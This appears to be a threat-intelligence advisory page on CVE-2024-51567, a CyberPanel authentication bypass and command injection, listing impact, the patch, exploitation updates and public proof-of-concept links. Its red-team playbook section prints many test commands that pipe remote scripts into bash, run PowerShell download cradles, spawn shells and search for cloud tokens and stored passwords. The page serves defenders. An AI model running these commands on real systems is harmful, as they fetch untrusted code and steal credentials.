CVE-2024-51567
Overview
This vulnerability is an authentication bypass combined with command injection affecting the upgrademysqlstatus function in CyberPanel's databases/views.py component. The root cause is the improper enforcement of secMiddleware, which only validates POST requests, allowing attackers to bypass authentication by sending non-POST requests. Additionally, the statusfile parameter accepts shell metacharacters without sanitization, enabling arbitrary command execution on the server.
Vulnerability Description
upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
Impact
An unauthenticated attacker can bypass authentication controls and execute arbitrary shell commands on the affected CyberPanel server. This enables full system compromise, including data theft, service disruption, or lateral movement within the network. No user interaction or valid credentials are required, increasing the attack surface and enabling remote exploitation from anywhere with network access to the vulnerable endpoint.
Solution
Users should upgrade CyberPanel to versions including the fix introduced in commit 5b08cd6d53f4dbc2107ad9f555122ce8b0996515 or later. Specifically, versions beyond 2.3.7 with this patch applied mitigate the issue. Administrators are advised to consult the official GitHub repository for patch details and apply the update promptly. Reference: https://github.com/usmannasir/cyberpanel/commit/5b08cd6d53f4dbc2107ad9f555122ce8b0996515
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in CyberPanel arises from a flaw in the `upgrademysqlstatus` function located in the databases/views.py file. This issue allows remote attackers to bypass authentication mechanisms and execute arbitrary commands on the server. The root cause lies in the improper handling of requests, specifically the reliance on a security middleware that only applies to POST requests. By crafting a specially formatted request that utilizes shell metacharacters in the `statusfile` property, an attacker can exploit this vulnerability to gain unauthorized access and execute commands with the privileges of the application. The flaw is particularly critical due to its high CVSS score, indicating a severe risk to affected systems.
Attack vectors for this vulnerability are straightforward, allowing for exploitation through crafted HTTP requests. An attacker can send a GET request to the vulnerable endpoint, circumventing the intended authentication checks. This method of exploitation is particularly insidious as it does not require any prior access to the system, making it accessible to any remote adversary. Once the attacker successfully executes arbitrary commands, they can manipulate the server environment, potentially leading to data breaches, system compromise, or further lateral movement within the network. The exploitation has already been observed in the wild, highlighting the urgency for organizations to address this vulnerability.
The real-world impact of this vulnerability can be significant, particularly for businesses relying on CyberPanel for web hosting and database management. Unauthorized command execution can lead to data loss, service disruption, and reputational damage. Organizations may face regulatory scrutiny if sensitive data is exposed or compromised due to this vulnerability. The potential for financial loss is amplified by the costs associated with incident response, recovery, and potential legal liabilities. As the threat landscape continues to evolve, the implications of such vulnerabilities underscore the importance of maintaining robust security practices.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating CyberPanel to the latest version is crucial, as patches are released to address known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests before they reach the application. Monitoring logs for unusual activity, such as unexpected command executions or anomalous request patterns, can aid in early detection of exploitation attempts. Furthermore, conducting regular security assessments and penetration testing can help identify and remediate vulnerabilities before they can be exploited by malicious actors.
In conclusion, the vulnerability in CyberPanel presents a serious risk to organizations that utilize this platform for their web hosting and database management needs. The ability for remote attackers to bypass authentication and execute arbitrary commands can lead to severe consequences, including data breaches and operational disruptions. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves to detect and mitigate this threat effectively. Proactive security measures, including timely updates and vigilant monitoring, are essential to safeguarding against such vulnerabilities in an increasingly complex threat landscape.
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2024-51567, indicating increased adversary focus on this critical CyberPanel vulnerability. This escalation is accompanied by the emergence of additional proof-of-concept exploits circulating publicly, which lowers the barrier for threat actors to weaponize the flaw. Our telemetry also confirms continued use of this vulnerability in ransomware campaigns, particularly by the PSAUX group, underscoring its operational relevance in active attacks. Although the EPSS score remains high and stable, the uptick in exploitation activity elevates the immediate risk to organizations running vulnerable CyberPanel versions. Defenders should regard this as a heightened threat environment where successful exploitation can lead to severe operational disruption and data compromise.
Update 2 — May 20, 2026
CSURFACE threat intelligence has identified a recalibration of the CVSS score for CVE-2024-51567 from 9.8 to a maximum severity of 10.0, reflecting a refined understanding of its criticality given the vulnerability’s unauthenticated remote code execution capabilities. Concurrently, our telemetry indicates a significant reduction in exploitation attempts, suggesting either partial mitigation efforts or shifting attacker focus. Despite this decline, the vulnerability remains actively exploited in ransomware campaigns, notably by the PSAUX group, maintaining its operational relevance. The stable EPSS score near the highest percentile confirms persistent exploitability and risk. This duality—reduced detection frequency but unchanged exploit potency—underscores a nuanced threat landscape where defenders cannot afford complacency. The elevation to a perfect CVSS score signals that successful exploitation continues to pose an extreme risk of system compromise and operational disruption. Organizations running vulnerable CyberPanel versions remain prime targets, and the presence of multiple proof-of-concept exploits in the wild continues to lower the barrier for adversaries. Overall, the threat level remains critical, with a subtle shift towards stealthier or more selective exploitation patterns.
Update 3 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2024-51567, evidenced by a notable surge in detection events and the emergence of multiple new proof-of-concept exploits circulating on public repositories. This broadened exploit landscape includes refined tools that facilitate bypassing existing protections more reliably, increasing the ease with which threat actors—particularly ransomware groups like PSAUX—can leverage this vulnerability for remote code execution. Although the CVSS score was adjusted slightly downward to 9.8, this reflects a more precise assessment rather than a reduction in threat severity. The sustained high EPSS score and stable exploitation trends underscore that the vulnerability remains a critical risk, with adversaries actively integrating these exploits into their operational toolkits. For defenders, this development signals an urgent need to maintain heightened vigilance and prioritize detection capabilities, as the attack surface is expanding and exploitation attempts are becoming more frequent and sophisticated.
Update 4 — July 05, 2026
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2024-51567, reflecting a growing adversary focus on this critical CyberPanel vulnerability. Our telemetry indicates that attackers are increasingly leveraging publicly available proof-of-concept exploits, including those integrated into popular penetration testing frameworks, to bypass authentication and execute arbitrary commands remotely. This uptick coincides with continued ransomware campaigns attributed to the PSAUX group, which remains the primary actor exploiting this flaw at scale. The persistence and expansion of these attacks underscore the vulnerability’s active weaponization and the sustained interest from threat actors in compromising CyberPanel instances. Consequently, the risk level associated with CVE-2024-51567 remains critically high, with the evolving exploitation landscape demanding ongoing attention from defenders to detect and respond to increasingly frequent and sophisticated intrusion attempts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cyberpanel | Cyberpanel | All |
cpe:2.3:a:cyberpanel:cyberpanel:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
CyberPanel Multi CVE Pre-auth RCE
exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve
|
DreyAnd, Valentin Lobstein, Luka Petrovic (refr4g) | Unknown | - | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ajayalf/CVE-2024-51567
CVE-2024-51567 is a Python PoC exploit targeting an RCE vulnerability in CyberPanel v2.3.6’s upgrademysqlstatus endpoint...
|
ajayalf | 5 | 1 | 2024-10-31 | View |
|
thehash007/CVE-2024-51567-RCE-EXPLOIT
cbyerpanel rce exploit
|
thehash007 | 1 | 0 | 2024-11-07 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
KKDT12138/cve-2024-51567-poc
CVE-2024-51567 is a Python PoC exploit targeting an RCE vulnerability in CyberPanel v2.3.6’s upgrademysqlstatus endpoint...
|
KKDT12138 | 0 | 0 | 2025-08-07 | View |
Threat Feed
16 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-51567 |
| cwe.mitre.org |
GitHub CVE
|
https://cwe.mitre.org/data/definitions/78.html |
| dreyand.rs |
GitHub CVE
|
https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce |
| github.com |
GitHub CVE
|
https://github.com/usmannasir/cyberpanel/commit/5b08cd6d53f4dbc2107ad9f555122ce8b0996515 |
| cyberpanel.net |
GitHub CVE
|
https://cyberpanel.net/KnowledgeBase/home/change-logs/ |
| cwe.mitre.org |
GitHub CVE
|
https://cwe.mitre.org/data/definitions/420.html |
| cyberpanel.net |
GitHub CVE
|
https://cyberpanel.net/blog/detials-and-fix-of-recent-security-issue-and-patch-of-cyberpanel |
| bleepingcomputer.com |
GitHub CVE
|
https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-51567 |